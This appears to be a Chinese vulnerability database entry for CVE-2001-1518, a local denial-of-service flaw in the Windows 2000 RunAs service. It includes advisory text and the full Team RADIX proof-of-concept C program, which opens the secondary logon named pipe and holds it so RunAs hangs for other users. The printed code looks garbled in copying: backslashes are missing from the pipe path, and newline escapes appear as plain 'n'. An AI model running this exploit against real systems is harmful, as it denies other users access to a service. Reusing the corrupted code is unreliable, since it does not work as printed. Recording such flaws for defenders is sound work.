Microsoft Windows 2000 RunAs Service服务拒绝漏洞

Microsoft Windows 2000 RunAs Service服务拒绝漏洞

漏洞ID 1106539 漏洞类型 设计错误
发布时间 2001-12-11 更新时间 2005-10-20
图片[1]-Microsoft Windows 2000 RunAs Service服务拒绝漏洞-安全小百科CVE编号 CVE-2001-1518
图片[2]-Microsoft Windows 2000 RunAs Service服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200112-200
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-200
|漏洞详情
Windows2000的RunAs(runas.exe)每次只创建一个会议实例,本地用户可以通过创建带有无任何服务请求的认证服务器的命名管道会话导致服务拒绝(RunAs挂起)。
|漏洞EXP
source: http://www.securityfocus.com/bid/3291/info

The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu.

When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service. 

// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

#define SECLOGON_PIPE   _T("\\.\pipe\secondarylogon")


void main()
{
   HANDLE hPipe;

   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Unable to open pipe, error %dn", GetLastError());
      return;
   }

   printf("Connected to pipe.  Press any key to disconnect.n");
   getche();

   CloseHandle(hPipe);
}
|参考资料

来源:BID
名称:3291
链接:http://www.securityfocus.com/bid/3291
来源:XF
名称:win2k-runas-dos(7533)
链接:http://www.iss.net/security_center/static/7533.php
来源:BUGTRAQ
名称:20011114RE:RadixResearchReportsRADIX1112200101,RADIX1112200102,andRADIX1112200103
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2001/11/msg00100.html

相关推荐: Multiple Browser Vendor Same Origin Policy Design Error Vulnerability

Multiple Browser Vendor Same Origin Policy Design Error Vulnerability 漏洞ID 1101772 漏洞类型 Design Error 发布时间 2002-07-29 更新时间 2002-07-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享